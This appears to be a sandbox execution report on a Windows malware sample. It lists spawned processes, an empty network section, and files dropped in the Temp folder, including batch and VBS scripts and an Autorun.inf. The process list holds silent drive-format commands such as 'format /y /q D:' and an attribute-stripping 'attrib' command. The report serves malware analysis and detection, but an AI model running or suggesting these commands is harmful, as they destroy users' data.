C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\format.com
format /y /q A:
C:\Windows\system32\format.com
format /y /q A:
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\format.com
format /y /q B:
C:\Windows\system32\format.com
format /y /q B:
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\format.com
format /y /q D:
C:\Windows\system32\format.com
format /y /q D:
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
Network
Files
C:\Users\Admin\AppData\Local\TempShingapi.sk.bat
C:\Users\Admin\AppData\Local\Temp\x.bin
C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\System32\Twain_20.dll
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat